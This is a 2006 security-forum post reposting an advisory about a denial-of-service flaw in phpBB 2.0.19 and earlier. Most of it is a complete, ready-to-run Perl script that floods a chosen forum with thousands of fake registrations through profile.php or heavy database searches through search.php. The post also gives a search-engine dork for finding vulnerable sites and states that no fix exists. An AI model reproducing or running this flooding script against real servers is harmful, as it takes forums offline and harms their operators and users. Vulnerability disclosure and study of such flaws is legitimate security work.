| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 168 
  Members: 0 
  Total: 168 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | phpBB 2.0.19 search.php and profile.php DOS Vulnerability |  |  
	| 
	
		|  Posted: Mon Feb 27, 2006 5:35 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| wugluskr |  | Beginner |  |  
  |  |  |  | Joined: Jun 08, 2005 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Found here: http://www.securityfocus.com/archive/1/423030/30/0/threaded 
 ------------------------------------------------------
 HYSA-2006-001 h4cky0u.org Advisory 010
 ------------------------------------------------------
 Date - Wed Jan 25 2006
 
 TITLE:
 ======
 
 phpBB 2.0.19 search.php and profile.php DOS Vulnerability
 
 SEVERITY:
 =========
 
 High
 
 SOFTWARE:
 =========
 
 phpBB 2.0.19 and prior
 
 INFO:
 =====
 
 phpBB is a high powered, fully scalable, and highly customizable
 Open Source bulletin board package. phpBB has a user-friendly
 interface, simple and straightforward administration panel, and
 helpful FAQ. Based on the powerful PHP server language and your
 choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
 phpBB is the ideal free community solution for all web sites.
 
 Support Website : http://www.phpbb.com
 
 BUG DESCRIPTION:
 ================
 
 The bug was originally found by HaCkZaTaN of NeoSecurityteam. The
 original exploit code can be found at -
 
 http://h4cky0u.org/viewtopic.php?t=637
 
 This one affected only versions uptill phpBB 2.0.15. The exploit code
 has been recoded which affects the latest version too. The bug resides
 in the following two scripts-
 
 profile.php << By registering as many users as you can.
 search.php << By searching in a way that the db cannot understand.
 
 Proof Of Concept Code:
 ======================
 
 #!/usr/bin/perl
 #######################################
 ## Recoded by: mix2mix and Elioni of http://ahg-khf.org
 ## And h4cky0u Security Forums (http://h4cky0u.org)
 ## Name: phpBBDoSReloaded
 ## Original Author: HaCkZaTaN of Neo Security Team
 ## Tested on phpBB 2.0.19 and earlier versions
 ## Ported to perl by g30rg3_x
 ## Date: 25/01/06
 #######################################
 use IO::Socket;
 
 ## Initialized X
 $x = 0;
 
 print q(
 phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
 Recoded by Albanian Hackers Group &
 h4cky0u Security Forums
 
 );
 print q(Host |without-> http://www.| );
 $host = <STDIN>;
 chop ($host);
 
 print q(Path |example-> /phpBB2/ or /| );
 $pth = <STDIN>;
 chop ($pth);
 
 print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If
 Visual Confirmation is enabled| );
 $type = <STDIN>;
 chop ($type);
 
 ## Tipi pКr regjistrim
 if($type == 1){
 
 ## User Loop for 9999 loops (enough for Flood xDDDD)
 while($x != 9999)
 {
 
 ## Antari qК regjistrohet automatikishtК "X"
 $uname = "username=AHG__" . "$x";
 
 ## Emaili qК regjistrohet ne bazКn "X"
 $umail = "&email=AHG__" . "$x";
 
 $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm
 =0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interes
 ts=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_p
 m=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=englis
 h&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=
 true&coppa=0&submit=Submit";
 
 $lrg = length $postit;
 
 my $sock = new IO::Socket::INET (
 PeerAddr => "$host",
 PeerPort => "80",
 Proto => "tcp",
 );
 die "\nNuk mundem te lidhemi me hostin sepse Кsht dosirat ose nuk
 egziston: $!\n" unless $sock;
 
 ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
 print $sock "POST $pth"."profile.php HTTP/1.1\n";
 print $sock "Host: $host\n";
 print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg,
 image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
 application/vnd.ms-powerpoint, application/msword, */*\n";
 print $sock "Referer: $host\n";
 print $sock "Accept-Language: en-us\n";
 print $sock "Content-Type: application/x-www-form-urlencoded\n";
 print $sock "Accept-Encoding: gzip, deflate\n";
 print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
 rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
 print $sock "Connection: Keep-Alive\n";
 print $sock "Cache-Control: no-cache\n";
 print $sock "Content-Length: $lrg\n\n";
 print $sock "$postit\n";
 close($sock);
 
 ## Print a "+" for every loop
 syswrite STDOUT, "+";
 
 $x++;
 }
 
 ## Tipi 2-shК pКr KКrkim(Flood)
 }
 elsif ($type == 2){
 
 while($x != 9999)
 {
 ## Final Search String to Send
 $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_term
 s=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly
 &search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=20
 0";
 
 ## Posit Length
 $lrg = length $postit;
 
 ## Connect Socket with Variables Provided By User
 my $sock = new IO::Socket::INET (
 PeerAddr => "$host",
 PeerPort => "80",
 Proto => "tcp",
 );
 die "\nThe Socket Can't Connect To The Desired Host or the Host is
 MayBe DoSed: $!\n" unless $sock;
 
 ## Sending Truth Socket The HTTP Commands For Send A BD Search Into
 phpBB Forums
 print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
 print $sock "Host: $host\n";
 print $sock "Accept:
 text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
 n;q=0.8,image/png,*/*;q=0.5\n";
 print $sock "Referer: $host\n";
 print $sock "Accept-Language: en-us\n";
 print $sock "Content-Type: application/x-www-form-urlencoded\n";
 print $sock "Accept-Encoding: gzip, deflate\n";
 print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;
 rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
 print $sock "Connection: Keep-Alive\n";
 print $sock "Cache-Control: no-cache\n";
 print $sock "Content-Length: $lrg\n\n";
 print $sock "$postit\n";
 close($sock);
 
 ## Print a "+" for every loop
 syswrite STDOUT, "+";
 
 ## Increment X in One for every Loop
 $x++;
 }
 }else{
 ## STF??? QfarК keni Shtypur
 die "MundКsia nuk Lejohet +_-???\n";
 }
 
 FIX:
 ====
 
 No fix available as of date.
 
 GOOGLEDORK:
 ===========
 
 "Powered by phpBB"
 
 CREDITS:
 ========
 
 - This vulnerability was discovered and researched by HaCkZaTaN of
 NeoSecurityteam.
 
 - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest
 release of the script -
 
 Web : http://ahg-khf.org
 
 mail : webmaster at ahg-khf dot org
 
 - Co Researcher -
 
 h4cky0u of h4cky0u Security Forums.
 
 mail : h4cky0u at gmail dot com
 
 web : http://www.h4cky0u.org
 
 ORIGINAL ADVISORY:
 ==================
 
 http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
 
 --
 http://www.h4cky0u.org
 (In)Security at its best...
 |  |  
		|  |  |  
	|  |  |  | 
 
	| www.waraxe.us Forum Index -> PhpBB 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |